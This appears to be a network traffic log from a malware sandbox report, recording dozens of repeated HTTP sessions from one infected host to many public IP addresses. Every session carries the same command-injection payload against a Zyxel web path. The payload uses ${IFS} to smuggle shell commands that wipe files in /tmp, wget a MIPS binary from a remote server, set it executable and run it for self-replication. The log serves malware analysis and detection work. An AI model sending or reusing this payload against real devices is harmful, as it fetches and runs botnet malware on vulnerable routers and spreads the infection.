                                                Jan 12, 2024 18:16:08.107189894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                613192.168.2.23418222.34.144.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107229948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                614192.168.2.235278075.215.26.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107295990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                615192.168.2.235040861.242.72.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107348919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                616192.168.2.2344206213.220.122.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107387066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                617192.168.2.2352192192.164.218.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107440948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                618192.168.2.2356542195.97.33.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107546091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                619192.168.2.236024290.93.115.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107597113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                620192.168.2.235579044.100.61.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107618093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                621192.168.2.2337816101.1.80.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107660055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                622192.168.2.2337908157.145.127.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107718945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                623192.168.2.233647625.247.45.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107777119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                624192.168.2.2353240136.58.215.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107845068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                625192.168.2.2339372194.254.241.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107888937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                626192.168.2.233458463.1.167.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.107937098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                627192.168.2.2335050163.114.214.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108028889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                628192.168.2.235072432.92.86.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108052015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                629192.168.2.2343194162.129.121.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108114004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                630192.168.2.2355394195.114.253.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108155012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                631192.168.2.233526265.153.164.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108165026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                632192.168.2.2339612153.129.58.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108237982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                633192.168.2.2343368130.22.222.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108305931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                634192.168.2.234687019.191.252.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108357906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                635192.168.2.2339758186.137.66.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108401060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                636192.168.2.2355870202.51.113.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108448982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                637192.168.2.235293497.248.250.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108536959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                638192.168.2.234725484.181.210.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108565092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                639192.168.2.2360426161.46.162.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108647108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                640192.168.2.235684237.55.1.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108701944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                641192.168.2.2345212202.95.74.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108756065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                642192.168.2.2360018217.169.34.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108815908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                643192.168.2.235137283.212.84.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108880043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                644192.168.2.2332866200.156.117.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108942032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                645192.168.2.235758693.120.209.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.108993053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                646192.168.2.2334944196.171.78.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109086990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                647192.168.2.2344186175.161.92.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109143972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                648192.168.2.2342990132.204.97.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109199047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                649192.168.2.233706072.188.151.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109257936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                650192.168.2.234826813.50.119.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109318018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                651192.168.2.2360474109.253.228.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109364986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                652192.168.2.233558899.240.56.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109391928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                653192.168.2.2345440149.162.111.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109427929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                654192.168.2.235465088.216.46.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109524965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                655192.168.2.235457849.173.18.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109605074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                656192.168.2.234789070.94.201.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109671116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                657192.168.2.234901478.94.192.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109735966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                658192.168.2.235426023.44.38.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109802008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                659192.168.2.2341932152.146.166.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109833956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                660192.168.2.2347704117.66.156.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109909058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                661192.168.2.235540445.182.49.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.109987020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                662192.168.2.2343286140.125.33.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110043049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                663192.168.2.233329478.157.234.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110131979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                664192.168.2.233377872.225.189.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110181093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                665192.168.2.2333038159.53.32.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110240936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                666192.168.2.2340800131.249.186.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110291958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                667192.168.2.233946492.152.79.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110356092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                668192.168.2.23493402.151.107.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110424042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                669192.168.2.2334896163.55.14.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110491037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                670192.168.2.2335184166.141.109.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110529900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                671192.168.2.234877046.217.193.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110603094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                672192.168.2.2343420172.44.233.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110658884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                673192.168.2.234927453.171.212.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110707045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                674192.168.2.2335696158.215.17.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:08.110769987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                675192.168.2.2342790209.93.171.36443
                                                TimestampBytes transferredDirectionData
